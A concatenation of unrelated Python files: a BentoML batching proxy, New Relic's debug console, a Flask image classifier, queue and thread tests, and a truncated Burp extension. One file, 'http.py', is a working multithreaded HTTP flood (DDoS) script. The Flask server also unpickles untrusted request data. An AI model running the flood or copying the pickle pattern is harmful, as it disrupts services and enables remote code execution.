except Exception as e: # pylint: disable=broad-except
self.metrics_request_exception.labels(
endpoint=api_route, exception_class=e.__class__.__name__
).inc()
logger.error(traceback.format_exc())
resp = aiohttp.web.Response(status=500)
self.metrics_request_total.labels(
endpoint=api_route, http_response_code=resp.status
).inc()
self.metrics_request_duration.labels(
endpoint=api_route, http_response_code=resp.status
).observe(time.time() - time_st)
_metrics_request_in_progress.dec()
return resp
async def _batch_handler_template(self, requests, api_route):
func = super(_MarshalService, self)._batch_handler_template
self.metrics_request_batch_size.labels(endpoint=api_route).observe(
len(requests)
)
return await func(requests, api_route)
return _MarshalService
@metrics_patch
class MarshalService:
"""
MarshalService creates a reverse proxy server in front of the actual API server,
implementing the micro batching feature.
It waits for a short period and packs multiple requests into a single batch
before sending them to the API server.
It applies an optimized CORK algorithm for best efficiency.
"""
@inject
def __init__(
self,
bento_bundle_path,
outbound_host="localhost",
outbound_port=None,
outbound_workers: int = Provide[BentoMLContainer.config.api_server.workers],
mb_max_batch_size: int = Provide[
BentoMLContainer.config.marshal_server.max_batch_size
],
mb_max_latency: int = Provide[
BentoMLContainer.config.marshal_server.max_latency
],
request_header_flag: str = Provide[
BentoMLContainer.config.marshal_server.request_header_flag
],
max_request_size: int = Provide[
BentoMLContainer.config.api_server.max_request_size
],
outbound_unix_socket: str = None,
enable_microbatch: bool = Provide[
BentoMLContainer.config.api_server.enable_microbatch
],
):
self._client = None
self.outbound_unix_socket = outbound_unix_socket
self.outbound_host = outbound_host
self.outbound_port = outbound_port
self.outbound_workers = outbound_workers
self.mb_max_batch_size = mb_max_batch_size
self.mb_max_latency = mb_max_latency
self.batch_handlers = dict()
self._outbound_sema = None # the semaphore to limit outbound connections
self.request_header_flag = request_header_flag
self.max_request_size = max_request_size
self.bento_service_metadata_pb = load_bento_service_metadata(bento_bundle_path)
if enable_microbatch:
self.setup_routes_from_pb(self.bento_service_metadata_pb)
if psutil.POSIX:
import resource
self.CONNECTION_LIMIT = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
self.CONNECTION_LIMIT = 1024
logger.info(
"Your system nofile limit is %d, which means each instance of microbatch "
"service is able to hold this number of connections at same time. "
"You can increase the number of file descriptors for the server process, "
"or launch more microbatch instances to accept more concurrent connection.",
self.CONNECTION_LIMIT,
)
def set_outbound_port(self, outbound_port):
self.outbound_port = outbound_port
def fetch_sema(self):
if self._outbound_sema is None:
self._outbound_sema = NonBlockSema(self.outbound_workers)
return self._outbound_sema
def get_client(self):
if self._client is None:
jar = aiohttp.DummyCookieJar()
if self.outbound_unix_socket:
conn = aiohttp.UnixConnector(path=self.outbound_unix_socket,)
else:
conn = aiohttp.TCPConnector(limit=30)
self._client = aiohttp.ClientSession(
connector=conn, auto_decompress=False, cookie_jar=jar,
)
return self._client
def __del__(self):
if getattr(self, '_client', None) is not None and not self._client.closed:
self._client.close()
def add_batch_handler(self, api_route, max_latency, max_batch_size):
'''
Params:
* max_latency: limit the max latency of overall request handling
* max_batch_size: limit the max batch size for handler
** the marshal server gives priority to meeting these limits over efficiency
'''
if api_route not in self.batch_handlers:
_func = CorkDispatcher(
max_latency,
max_batch_size,
shared_sema=self.fetch_sema(),
fallback=aiohttp.web.HTTPTooManyRequests,
)(functools.partial(self._batch_handler_template, api_route=api_route))
self.batch_handlers[api_route] = _func
def setup_routes_from_pb(self, bento_service_metadata_pb):
for api_pb in bento_service_metadata_pb.apis:
if api_pb.batch:
max_latency = (
self.mb_max_latency or api_pb.mb_max_latency or DEFAULT_MAX_LATENCY
)
max_batch_size = (
self.mb_max_batch_size
or api_pb.mb_max_batch_size
or DEFAULT_MAX_BATCH_SIZE
)
self.add_batch_handler(api_pb.route, max_latency, max_batch_size)
logger.info(
"Micro batch enabled for API `%s` max-latency: %s"
" max-batch-size %s",
api_pb.route,
max_latency,
max_batch_size,
)
async def request_dispatcher(self, request):
with get_tracer().async_span(
service_name=self.__class__.__name__,
span_name="[1]http request",
is_root=True,
standalone=True,
sample_rate=0.001,
):
api_route = request.match_info.get("path")
if api_route in self.batch_handlers:
req = HTTPRequest(
tuple((k.decode(), v.decode()) for k, v in request.raw_headers),
await request.read(),
)
try:
resp = await self.batch_handlers[api_route](req)
except RemoteException as e:
# known remote exception
logger.error(traceback.format_exc())
resp = aiohttp.web.Response(
status=e.payload.status,
headers=e.payload.headers,
body=e.payload.body,
)
except Exception: # pylint: disable=broad-except
logger.error(traceback.format_exc())
resp = aiohttp.web.HTTPInternalServerError()
else:
resp = await self.relay_handler(request)
return resp
async def relay_handler(self, request):
data = await request.read()
url = request.url.with_host(self.outbound_host).with_port(self.outbound_port)
with get_tracer().async_span(
service_name=self.__class__.__name__,
span_name=f"[2]{url.path} relay",
request_headers=request.headers,
):
try:
client = self.get_client()
async with client.request(
request.method, url, data=data, headers=request.headers
) as resp:
body = await resp.read()
except aiohttp.client_exceptions.ClientConnectionError:
return aiohttp.web.Response(status=503, body=b"Service Unavailable")
return aiohttp.web.Response(
status=resp.status, body=body, headers=resp.headers,
)
async def _batch_handler_template(self, requests, api_route):
'''
batch request handler
params:
* requests: list of aiohttp request
* api_route: called API name
raise:
* RemoteException: known exceptions from model server
* Exception: other exceptions
'''
headers = {self.request_header_flag: "true"}
api_url = f"http://{self.outbound_host}:{self.outbound_port}/{api_route}"
with get_tracer().async_span(
service_name=self.__class__.__name__,
span_name=f"[2]merged {api_route}",
request_headers=headers,
):
reqs_s = DataLoader.merge_requests(requests)
try:
client = self.get_client()
async with client.post(api_url, data=reqs_s, headers=headers) as resp:
raw = await resp.read()
except aiohttp.client_exceptions.ClientConnectionError as e:
raise RemoteException(
e, payload=HTTPResponse(status=503, body=b"Service Unavailable")
)
if resp.status != 200:
raise RemoteException(
f"Bad response status from model server:\n{resp.status}\n{raw}",
payload=HTTPResponse(
status=resp.status,
headers=tuple(resp.headers.items()),
body=raw,
),
)
merged = DataLoader.split_responses(raw)
return tuple(
aiohttp.web.Response(
body=i.body, headers=i.headers, status=i.status or 500
)
for i in merged
)
def async_start(self, port):
"""
Start a micro batch server in a child process on the given port.
"""
marshal_proc = multiprocessing.Process(
target=self.fork_start_app, kwargs=dict(port=port), daemon=True,
)
marshal_proc.start()
logger.info("Running micro batch service on :%d", port)
def make_app(self):
app = aiohttp.web.Application(client_max_size=self.max_request_size)
app.router.add_view("/", self.relay_handler)
app.router.add_view("/{path:.*}", self.request_dispatcher)
return app
def fork_start_app(
self, port=Provide[BentoMLContainer.config.api_server.port],
):
# Use new eventloop in the fork process to avoid problems on MacOS
# ref: https://groups.google.com/forum/#!topic/python-tornado/DkXjSNPCzsI
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
app = self.make_app()
aiohttp.web.run_app(app, port=port)
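# Usage sketch (illustrative only; paths and ports are hypothetical, and the
# BentoMLContainer must be wired so the injected defaults resolve):
#     marshal = MarshalService(
#         bento_bundle_path="/path/to/saved_bundle",
#         outbound_host="localhost",
#         outbound_port=5000,
#     )
#     marshal.async_start(port=5001)  # forks a child process running the aiohttp app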
|
console.py
|
# Copyright 2010 New Relic, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import atexit
import cmd
import code
import functools
import glob
import inspect
import optparse
import os
import shlex
import socket
import sys
import threading
import time
import traceback
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
try:
import __builtin__
except ImportError:
import builtins as __builtin__
def _argspec_py2(func):
return inspect.getargspec(func)
def _argspec_py3(func):
a = inspect.getfullargspec(func)
return (a.args, a.varargs, a.varkw, a.defaults)
if hasattr(inspect, "getfullargspec"):
_argspec = _argspec_py3
else:
_argspec = _argspec_py2
try:
from collections import OrderedDict
from inspect import signature
def doc_signature(func):
sig = signature(func)
sig._parameters = OrderedDict(list(sig._parameters.items())[1:])
return str(sig)
except ImportError:
from inspect import formatargspec
def doc_signature(func):
args, varargs, keywords, defaults = _argspec(func)
return formatargspec(args[1:], varargs, keywords, defaults)
from newrelic.api.object_wrapper import ObjectWrapper
from newrelic.api.transaction import Transaction
from newrelic.core.agent import agent_instance
from newrelic.core.config import flatten_settings, global_settings
from newrelic.core.trace_cache import trace_cache
_trace_cache = trace_cache()
def shell_command(wrapped):
args, varargs, keywords, defaults = _argspec(wrapped)
parser = optparse.OptionParser()
for name in args[1:]:
parser.add_option("--%s" % name, dest=name)
@functools.wraps(wrapped)
def wrapper(self, line):
result = shlex.split(line)
(options, args) = parser.parse_args(result)
kwargs = {}
for key, value in options.__dict__.items():
if value is not None:
kwargs[key] = value
return wrapped(self, *args, **kwargs)
if wrapper.__name__.startswith("do_"):
prototype = wrapper.__name__[3:] + " " + doc_signature(wrapped)
if hasattr(wrapper, "__doc__") and wrapper.__doc__ is not None:
wrapper.__doc__ = "\n".join((prototype, wrapper.__doc__.lstrip("\n")))
return wrapper
_consoles = threading.local()
def acquire_console(shell):
_consoles.active = shell
def release_console():
del _consoles.active
def setquit():
"""Define new built-ins 'quit' and 'exit'.
These are simply strings that display a hint on how to exit.
"""
if os.sep == ":":
eof = "Cmd-Q"
elif os.sep == "\\":
eof = "Ctrl-Z plus Return"
else:
eof = "Ctrl-D (i.e. EOF)"
class Quitter(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "Use %s() or %s to exit" % (self.name, eof)
def __call__(self, code=None):
# If executed with our interactive console, only raise the
# SystemExit exception but don't close sys.stdout as we are
# not the owner of it.
if hasattr(_consoles, "active"):
raise SystemExit(code)
# Shells like IDLE catch the SystemExit, but listen when their
# stdin wrapper is closed.
try:
sys.stdin.close()
except Exception:
pass
raise SystemExit(code)
__builtin__.quit = Quitter("quit")
__builtin__.exit = Quitter("exit")
class OutputWrapper(ObjectWrapper):
def flush(self):
try:
shell = _consoles.active
return shell.stdout.flush()
except Exception:
return self._nr_next_object.flush()
def write(self, data):
try:
shell = _consoles.active
return shell.stdout.write(data)
except Exception:
return self._nr_next_object.write(data)
def writelines(self, data):
try:
shell = _consoles.active
return shell.stdout.writelines(data)
except Exception:
return self._nr_next_object.writelines(data)
def intercept_console():
setquit()
sys.stdout = OutputWrapper(sys.stdout, None, None)
sys.stderr = OutputWrapper(sys.stderr, None, None)
class EmbeddedConsole(code.InteractiveConsole):
def write(self, data):
self.stdout.write(data)
self.stdout.flush()
def raw_input(self, prompt):
self.stdout.write(prompt)
self.stdout.flush()
line = self.stdin.readline()
line = line.rstrip("\r\n")
return line
class ConsoleShell(cmd.Cmd):
use_rawinput = 0
def __init__(self):
cmd.Cmd.__init__(self)
self.do_prompt("on")
def emptyline(self):
pass
def help_help(self):
print(
"""help (command)
Output list of commands or help details for named command.""",
file=self.stdout,
)
@shell_command
def do_prompt(self, flag=None):
"""
Enable or disable the console prompt."""
if flag == "on":
self.prompt = "(newrelic:%d) " % os.getpid()
elif flag == "off":
self.prompt = ""
@shell_command
def do_exit(self):
"""
Exit the console."""
return True
@shell_command
def do_process_id(self):
"""
Displays the process ID of the process."""
print(os.getpid(), file=self.stdout)
@shell_command
def do_sys_prefix(self):
"""
Displays the value of sys.prefix."""
print(sys.prefix, file=self.stdout)
@shell_command
def do_sys_path(self):
"""
Displays the value of sys.path."""
print(sys.path, file=self.stdout)
@shell_command
def do_sys_modules(self):
"""
Displays the list of Python modules loaded."""
for name, module in sorted(sys.modules.items()):
if module is not None:
file = getattr(module, "__file__", None)
print("%s - %s" % (name, file), file=self.stdout)
@shell_command
def do_sys_meta_path(self):
"""
Displays the value of sys.meta_path."""
print(sys.meta_path, file=self.stdout)
@shell_command
def do_os_environ(self):
"""
Displays the set of user environment variables."""
for key, name in os.environ.items():
print("%s = %r" % (key, name), file=self.stdout)
@shell_command
def do_current_time(self):
"""
Displays the current time."""
print(time.asctime(), file=self.stdout)
@shell_command
def do_config_args(self):
"""
Displays the configure arguments used to build Python."""
args = ""
try:
# This may fail if using package Python and the
# developer package for Python isn't also installed.
import distutils.sysconfig
args = distutils.sysconfig.get_config_var("CONFIG_ARGS")
except Exception:
pass
print(args, file=self.stdout)
@shell_command
def do_dump_config(self, name=None):
"""
Displays global configuration or that of the named application.
"""
if name is None:
config = agent_instance().global_settings()
else:
config = agent_instance().application_settings(name)
if config is not None:
config = flatten_settings(config)
keys = sorted(config.keys())
for key in keys:
print("%s = %r" % (key, config[key]), file=self.stdout)
@shell_command
def do_agent_status(self):
"""
Displays general status information about the agent, registered
applications, harvest cycles etc.
"""
agent_instance().dump(self.stdout)
@shell_command
def do_applications(self):
"""
Displays a list of the applications.
"""
print(repr(sorted(agent_instance().applications.keys())), file=self.stdout)
@shell_command
def do_application_status(self, name=None):
"""
Displays general status information about an application, last
harvest cycle, etc.
"""
if name is not None:
applications = [agent_instance().application(name)]
else:
applications = agent_instance().applications.values()
for application in applications:
if application is not None:
application.dump(self.stdout)
print(file=self.stdout)
@shell_command
def do_import_hooks(self):
"""
Displays list of registered import hooks, which have fired and
which encountered errors.
"""
from newrelic.config import module_import_hook_results
results = module_import_hook_results()
for key in sorted(results.keys()):
result = results[key]
if result is None:
if key[0] not in sys.modules:
print("%s: PENDING" % (key,), file=self.stdout)
else:
print("%s: IMPORTED" % (key,), file=self.stdout)
elif not result:
print("%s: INSTRUMENTED" % (key,), file=self.stdout)
else:
print("%s: FAILED" % (key,), file=self.stdout)
for line in result:
print(line, end="", file=self.stdout)
@shell_command
def do_transactions(self):
""" """
for item in _trace_cache.active_threads():
transaction, thread_id, thread_type, frame = item
print("THREAD", item, file=self.stdout)
if transaction is not None:
transaction.dump(self.stdout)
print(file=self.stdout)
@shell_command
def do_interpreter(self):
"""
When enabled in the configuration file, will start up an embedded
interactive Python interpreter. Invoke 'exit()' or 'quit()' to
escape the interpreter session."""
enabled = False
_settings = global_settings()
if not _settings.console.allow_interpreter_cmd:
print("Sorry, the embedded Python interpreter is disabled.", file=self.stdout)
return
locals = {}
locals["stdin"] = self.stdin
locals["stdout"] = self.stdout
console = EmbeddedConsole(locals)
console.stdin = self.stdin
console.stdout = self.stdout
acquire_console(self)
try:
console.interact()
except SystemExit:
pass
finally:
release_console()
@shell_command
def do_threads(self):
"""
Display stack trace dumps for all threads currently executing
within the Python interpreter.
Note that if coroutines are being used, such as systems based
on greenlets, then only the thread stack of the currently
executing coroutine will be displayed."""
all = []
for threadId, stack in sys._current_frames().items():
block = []
block.append("# ThreadID: %s" % threadId)
thr = threading._active.get(threadId)
if thr:
block.append("# Type: %s" % type(thr).__name__)
block.append("# Name: %s" % thr.name)
for filename, lineno, name, line in traceback.extract_stack(stack):
block.append("File: '%s', line %d, in %s" % (filename, lineno, name))
if line:
block.append(" %s" % (line.strip()))
all.append("\n".join(block))
print("\n\n".join(all), file=self.stdout)
class ConnectionManager(object):
def __init__(self, listener_socket):
self.__listener_socket = listener_socket
self.__console_initialized = False
if not os.path.isabs(self.__listener_socket):
host, port = self.__listener_socket.split(":")
port = int(port)
self.__listener_socket = (host, port)
self.__thread = threading.Thread(target=self.__thread_run, name="NR-Console-Manager")
self.__thread.daemon = True
self.__thread.start()
def __socket_cleanup(self, path):
try:
os.unlink(path)
except Exception:
pass
def __thread_run(self):
if type(self.__listener_socket) == type(()):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(self.__listener_socket)
else:
try:
os.unlink(self.__listener_socket)
except Exception:
pass
listener = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
listener.bind(self.__listener_socket)
atexit.register(self.__socket_cleanup, self.__listener_socket)
os.chmod(self.__listener_socket, 0o600)
listener.listen(5)
while True:
client, addr = listener.accept()
if not self.__console_initialized:
self.__console_initialized = True
intercept_console()
shell = ConsoleShell()
shell.stdin = client.makefile("r")
shell.stdout = client.makefile("w")
while True:
try:
shell.cmdloop()
except Exception:
shell.stdout.flush()
print("Unexpected exception.", file=shell.stdout)
exc_info = sys.exc_info()
traceback.print_exception(exc_info[0], exc_info[1], exc_info[2], file=shell.stdout)
exc_info = None
else:
break
shell.stdin = None
shell.stdout = None
del shell
client.close()
class ClientShell(cmd.Cmd):
prompt = "(newrelic) "
def __init__(self, config_file, stdin=None, stdout=None, log=None):
cmd.Cmd.__init__(self, stdin=stdin, stdout=stdout)
self.__config_file = config_file
self.__config_object = ConfigParser.RawConfigParser()
self.__log_object = log
if not self.__config_object.read([config_file]):
raise RuntimeError("Unable to open configuration file %s." % config_file)
listener_socket = self.__config_object.get("newrelic", "console.listener_socket") % {"pid": "*"}
if os.path.isabs(listener_socket):
self.__servers = [(socket.AF_UNIX, path) for path in sorted(glob.glob(listener_socket))]
else:
host, port = listener_socket.split(":")
port = int(port)
self.__servers = [(socket.AF_INET, (host, port))]
def emptyline(self):
pass
def help_help(self):
print(
"""help (command)
Output list of commands or help details for named command.""",
file=self.stdout,
)
def do_exit(self, line):
"""exit
Exit the client shell."""
return True
def do_servers(self, line):
"""servers
Display a list of the servers which can be connected to."""
for i in range(len(self.__servers)):
print("%s: %s" % (i + 1, self.__servers[i]), file=self.stdout)
def do_connect(self, line):
"""connect [index]
Connect to the server from the servers list with the given index. If
there is only one server then the index position does not need to
be supplied."""
if len(self.__servers) == 0:
print("No servers to connect to.", file=self.stdout)
return
if not line:
if len(self.__servers) != 1:
print("Multiple servers, which should be used?", file=self.stdout)
return
else:
line = "1"
try:
selection = int(line)
except Exception:
selection = None
if selection is None:
print("Server selection not an integer.", file=self.stdout)
return
if selection <= 0 or selection > len(self.__servers):
print("Invalid server selected.", file=self.stdout)
return
server = self.__servers[selection - 1]
client = socket.socket(server[0], socket.SOCK_STREAM)
client.connect(server[1])
def write():
while 1:
try:
c = sys.stdin.read(1)
if not c:
client.shutdown(socket.SHUT_RD)
break
if self.__log_object:
self.__log_object.write(c)
client.sendall(c.encode("utf-8"))
except Exception:
break
def read():
while 1:
try:
c = client.recv(1).decode("utf-8")
if not c:
break
if self.__log_object:
self.__log_object.write(c)
sys.stdout.write(c)
sys.stdout.flush()
except Exception:
break
thread1 = threading.Thread(target=write)
thread1.daemon = True
thread2 = threading.Thread(target=read)
thread2.daemon = True
thread1.start()
thread2.start()
thread2.join()
return True
def main():
if len(sys.argv) == 1:
print("Usage: newrelic-console config_file")
sys.exit(1)
shell = ClientShell(sys.argv[1])
shell.cmdloop()
if __name__ == "__main__":
main()
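# Usage sketch (illustrative only; the config path is hypothetical). Run the
# client shell against an agent whose console.listener_socket is configured,
# then list and connect to a server from the prompt:
#     $ newrelic-console /path/to/newrelic.ini
#     (newrelic) servers
#     (newrelic) connect 1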
|
main.py
|
from flask import Flask, request
import pickle, json, cv2, math, threading
from imgReg import run
import tensorflow as tf
from cnn import CNN
import matplotlib.pyplot as plt
img_count = 0 # to assign image name
cnn = CNN("colour")
graph = tf.get_default_graph() # to tackle thread issues
app = Flask(__name__)
# Endpoint to receive image data then localizes and classifies images
@app.route('/', methods=['POST'])
def receiveImage():
global img_count, graph, predictions, images, uniquePreds, areas
content = request.data
frame = pickle.loads(content) # get serialized data
cv2.imwrite("../raw/img"+str(img_count)+".jpg", frame)
pred, file, area, pos = run(frame, graph, cnn, img_count)
predictions.append(pred)
if pred not in uniquePreds: # new prediction in this maze
images.append(file)
uniquePreds.add(pred)
areas[pred] = [img_count, area, pos]
print("Detected", pred)
elif pred > 0: # prediction has been detected before
temp_list = areas.get(pred)
# if this new prediction has a bigger bounding rectangle than the previous one
if area > temp_list[1]:
areas[pred] = [img_count, area, pos]
img_count+=1
return ('', 204) # return a no content response
# Endpoint to send classification results to algo team
@app.route('/end', methods=['GET'])
def finished():
global predictions, images
positions = []
new_preds = [-1 for i in range(len(predictions))]
for pred, temp in areas.items():
new_preds[temp[0]] = pred # update the final prediction list
for pred in new_preds:
if pred > 0:
# get the positions of the bounding rectangles
positions.append(areas.get(pred)[2])
print(json.dumps(new_preds)+";"+json.dumps(positions))
threading.Thread(target=plotImages, args=(images,)).start()
return json.dumps(new_preds)+";"+json.dumps(positions)
def plotImages(images):
toPlot = []
for file in images:
img = cv2.imread(file)
toPlot.append(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
_, axs = plt.subplots(math.ceil(len(toPlot)/3), 3, gridspec_kw = {'wspace':0, 'hspace':0}, figsize=(100,100))
for img, ax in zip(toPlot, axs.flatten()):
ax.imshow(img)
ax.set_xticklabels([])
ax.set_yticklabels([])
plt.show()
import os
os._exit(1)
# for debug
def forDebug():
global img_count, graph, predictions, images, areas, uniquePreds
import os
location = "../raw/"
files = os.listdir(location)
files = sorted(files, key=lambda x: int(x[3:-4]))
for f in files:
frame = cv2.imread(location+f)
pred, file, area, pos = run(frame, graph, cnn, img_count)
predictions.append(pred)
if pred not in uniquePreds:
images.append(file)
uniquePreds.add(pred)
areas[pred] = [img_count, area, pos]
print("Detected", pred)
elif pred > 0:
temp_list = areas.get(pred)
if area > temp_list[1]:
areas[pred] = [img_count, area, pos]
img_count+=1
# for debug
def debugEnd(images):
positions = []
new_preds = [-1 for i in range(len(predictions))]
for pred, temp in areas.items():
new_preds[temp[0]] = pred
for pred in new_preds:
if pred > 0:
positions.append(areas.get(pred)[2])
print(json.dumps(new_preds)+";"+json.dumps(positions))
toPlot = []
for file in images:
img = cv2.imread(file)
toPlot.append(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
_, axs = plt.subplots(math.ceil(len(toPlot)/3), 3, gridspec_kw = {'wspace':0, 'hspace':0}, figsize=(100,100))
for img, ax in zip(toPlot, axs.flatten()):
ax.imshow(img)
ax.set_xticklabels([])
ax.set_yticklabels([])
plt.show()
if __name__ == '__main__':
predictions = []
images = []
areas = {}
uniquePreds = set([-1])
app.run(host='0.0.0.0', port=8123)
# forDebug()
# debugEnd(images)
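# Client sketch (illustrative only; the image path is hypothetical and the
# requests library is assumed to be available). The / endpoint expects a
# pickled OpenCV frame in the request body:
#     import pickle, requests, cv2
#     frame = cv2.imread("test.jpg")
#     requests.post("http://localhost:8123/", data=pickle.dumps(frame))
#     requests.get("http://localhost:8123/end")  # returns predictions;positions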
|
test_thread.py
|
from threading import Thread
from time import sleep
class test_thread:
def __init__(self):
self.direction = 0
self.step_counter = 0
self.killed = False  # set by run() to stop the worker loop
def run(self):
thread_data = Thread(target=self.threaded_function_data)
thread_data.start()
sleep(2)
self.killed = True  # signal the worker loop to stop; setting an attribute on the Thread object had no effect
def threaded_function_data(self):
c = 0
while c < 100000000000000000 and not self.killed:
print('lala')
c += 1
if __name__ == '__main__':
t = test_thread()
t.run()
|
batching_queue_test.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for actorpool.BatchingQueue.
Basic functionalities actorpool.BatchingQueue are tested
in libtorchbeast/actorpool_test.cc.
"""
import threading
import time
import unittest
import numpy as np
import torch
import libtorchbeast
class BatchingQueueTest(unittest.TestCase):
def test_bad_construct(self):
with self.assertRaisesRegex(ValueError, "Min batch size must be >= 1"):
libtorchbeast.BatchingQueue(
batch_dim=3, minimum_batch_size=0, maximum_batch_size=1
)
with self.assertRaisesRegex(
ValueError, "Max batch size must be >= min batch size"
):
libtorchbeast.BatchingQueue(
batch_dim=3, minimum_batch_size=1, maximum_batch_size=0
)
def test_multiple_close_calls(self):
queue = libtorchbeast.BatchingQueue()
queue.close()
with self.assertRaisesRegex(RuntimeError, "Queue was closed already"):
queue.close()
def test_check_inputs(self):
queue = libtorchbeast.BatchingQueue(batch_dim=2)
with self.assertRaisesRegex(
ValueError, "Enqueued tensors must have more than batch_dim =="
):
queue.enqueue(torch.ones(5))
with self.assertRaisesRegex(
ValueError, "Cannot enqueue empty vector of tensors"
):
queue.enqueue([])
with self.assertRaisesRegex(
libtorchbeast.ClosedBatchingQueue, "Enqueue to closed queue"
):
queue.close()
queue.enqueue(torch.ones(1, 1, 1))
def test_simple_run(self):
queue = libtorchbeast.BatchingQueue(
batch_dim=0, minimum_batch_size=1, maximum_batch_size=1
)
inputs = torch.zeros(1, 2, 3)
queue.enqueue(inputs)
batch = next(queue)
np.testing.assert_array_equal(batch, inputs)
def test_batched_run(self, batch_size=2):
queue = libtorchbeast.BatchingQueue(
batch_dim=0, minimum_batch_size=batch_size, maximum_batch_size=batch_size
)
inputs = [torch.full((1, 2, 3), i) for i in range(batch_size)]
def enqueue_target(i):
while queue.size() < i:
# Make sure thread i calls enqueue before thread i + 1.
time.sleep(0.05)
queue.enqueue(inputs[i])
enqueue_threads = []
for i in range(batch_size):
enqueue_threads.append(
threading.Thread(
target=enqueue_target, name=f"enqueue-thread-{i}", args=(i,)
)
)
for t in enqueue_threads:
t.start()
batch = next(queue)
np.testing.assert_array_equal(batch, torch.cat(inputs))
for t in enqueue_threads:
t.join()
class BatchingQueueProducerConsumerTest(unittest.TestCase):
def test_many_consumers(
self, enqueue_threads_number=16, repeats=100, dequeue_threads_number=64
):
queue = libtorchbeast.BatchingQueue(batch_dim=0)
lock = threading.Lock()
total_batches_consumed = 0
def enqueue_target(i):
for _ in range(repeats):
queue.enqueue(torch.full((1, 2, 3), i))
def dequeue_target():
nonlocal total_batches_consumed
for batch in queue:
batch_size, *_ = batch.shape
with lock:
total_batches_consumed += batch_size
enqueue_threads = []
for i in range(enqueue_threads_number):
enqueue_threads.append(
threading.Thread(
target=enqueue_target, name=f"enqueue-thread-{i}", args=(i,)
)
)
dequeue_threads = []
for i in range(dequeue_threads_number):
dequeue_threads.append(
threading.Thread(target=dequeue_target, name=f"dequeue-thread-{i}")
)
for t in enqueue_threads + dequeue_threads:
t.start()
for t in enqueue_threads:
t.join()
queue.close()
for t in dequeue_threads:
t.join()
self.assertEqual(total_batches_consumed, repeats * enqueue_threads_number)
if __name__ == "__main__":
unittest.main()
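# Minimal usage sketch (mirrors test_simple_run above; requires the compiled
# libtorchbeast extension and the torch import from this file):
#     queue = libtorchbeast.BatchingQueue(
#         batch_dim=0, minimum_batch_size=1, maximum_batch_size=4
#     )
#     queue.enqueue(torch.zeros(1, 2, 3))
#     batch = next(queue)  # blocks until at least minimum_batch_size tensors arrive
#     queue.close()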
|
http.py
|
#!/usr/bin/env python3
import random
import socket,threading,sys,random
import useragents
ip = sys.argv[1]
port = sys.argv[2]
print("[+] Attack Started >:)")
wdata = open("/home/kali/Desktop/DDoS/scripts/headers.txt","r")
data= wdata.read()
def attacks():
while True:
try:
ran = random.choice(useragents.uslist)
pack = str("GET HTTP/1.1\nHost:"+str(ip)+"\n\nUser-Agent:"+str(ran)+"\n\n"+data).encode("utf-8")
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,int(port)))
s.sendto(pack,(ip,int(port)))
except socket.error as e:
print("[!] Can't Connect the target, it could be down!")
print("\n\n",e)
exit()
for i in range(500):
thread = threading.Thread(target=attacks)
thread.start()
|
FransLinkfinder.py
|
#
# BurpLinkFinder - Find links within JS files.
#
# Copyright (c) 2019 Frans Hendrik Botes
# Credit to https://github.com/GerbenJavado/LinkFinder for the idea and regex
#
from burp import IBurpExtender, IScannerCheck, IScanIssue, ITab
from java.io import PrintWriter
from java.net import URL
from java.util import ArrayList, List
from java.util.regex import Matcher, Pattern
import binascii
import base64
import re
from javax import swing
from java.awt import Font, Color
from threading import Thread
from array import array
from java.awt import EventQueue
from java.lang import Runnable
from thread import start_new_thread
from javax.swing import JFileChooser
# Using the Runnable class for thread-safety with Swing
class Run(Runnable):
def __init__(self, runner):
self.runner = runner
def run(self):
self.runner()
# Needed params
JSExclusionList = ['jquery', 'google-analytics','gpt.js']
class BurpExtender(IBurpExtender, IScannerCheck, ITab):
def registerExtenderCallbacks(self, callbacks):
self.callbacks = callbacks
self.helpers = callbacks.getHelpers()
callbacks.setExtensionName("BurpJSLinkFinder")
callbacks.issueAlert("BurpJSLinkFinder Passive Scanner enabled")
stdout = PrintWriter(callbacks.getStdout(), True)
stderr = PrintWriter(callbacks.getStderr(), True)
callbacks.registerScannerCheck(self)
self.initUI()
self.callbacks.addSuiteTab(self)
print ("Burp JS LinkFinder loaded.")
print ("Copyright (c) 2019 Frans Hendrik Botes")
self.outputTxtArea.setText("Burp JS LinkFinder loaded." + "\n" + "Copyright (c) 2019 Frans Hendrik Botes" + "\n")
def initUI(self):
self.tab = swing.JPanel()
# UI for Output
self.outputLabel = swing.JLabel("LinkFinder Log:")
self.outputLabel.setFont(Font("Tahoma", Font.BOLD, 14))
self.outputLabel.setForeground(Color(255,102,52))
self.logPane = swing.JScrollPane()
self.outputTxtArea = swing.JTextArea()
self.outputTxtArea.setFont(Font("Consolas", Font.PLAIN, 12))
self.outputTxtArea.setLineWrap(True)
self.logPane.setViewportView(self.outputTxtArea)
self.clearBtn = swing.JButton("Clear Log", actionPerformed=self.clearLog)
self.exportBtn = swing.JButton("Export Log", actionPerformed=self.exportLog)
self.parentFrm = swing.JFileChooser()
# Layout
layout = swing.GroupLayout(self.tab)
layout.setAutoCreateGaps(True)
layout.setAutoCreateContainerGaps(True)
self.tab.setLayout(layout)
layout.setHorizontalGroup(
layout.createParallelGroup()
.addGroup(layout.createSequentialGroup()
.addGroup(layout.createParallelGroup()
.addComponent(self.outputLabel)
.addComponent(self.logPane)
